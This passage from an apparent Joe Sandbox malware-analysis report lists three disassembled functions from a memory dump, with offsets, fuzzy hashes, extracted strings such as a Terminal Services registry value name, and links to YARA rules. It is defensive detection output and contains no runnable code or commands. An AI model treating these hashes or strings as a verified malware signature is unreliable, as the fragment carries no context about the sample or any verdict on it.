                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  • Opcode ID: 4a8ed28feaf5ae890b153a34ecd37a81f10e7de497d30137385dca1ad106894a
                                                  • Instruction ID: 987fe2a722ed9587fb816110694fd2745c38a0fe6d56707671e850e7056d61e5
                                                  • Opcode Fuzzy Hash: 4a8ed28feaf5ae890b153a34ecd37a81f10e7de497d30137385dca1ad106894a
                                                  • Instruction Fuzzy Hash: 23519EB5E102588FEB15CF95C88865DFBF4EF84398F26802AD0499F650EB709946CBA0
                                                  Function 36D504E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36D5063D
                                                  • kLsE, xrefs: 36D50540
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  • Opcode ID: 5188c6797699399bb4c09b51b902e3a06a201945fdab306fd468884c7d936ce9
                                                  • Instruction ID: f7629a2b297ce7262c1d6edfdacd4109063b1e4ba533a5840befb58542449c24
                                                  • Opcode Fuzzy Hash: 5188c6797699399bb4c09b51b902e3a06a201945fdab306fd468884c7d936ce9
                                                  • Instruction Fuzzy Hash: AD51C0B59147429FDB14DF25D5406A7B7E4AF84304F11483EEA9A87A40E730D586CFE2
                                                  Function 36D4DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: 07ef34247bd899df9ccdd334e806e3507d7f6150ec631832c6a4f73ee25999be
                                                  • Instruction ID: 6c2605d913449f438ce1f50824105cbca1508f9fe95732b0015d83698c53c27d
                                                  • Opcode Fuzzy Hash: 07ef34247bd899df9ccdd334e806e3507d7f6150ec631832c6a4f73ee25999be
                                                  • Instruction Fuzzy Hash: A44180B1A087459FD311CF29C544A5ABBE4FF88318F044A2EF588DB340DB71E905CB96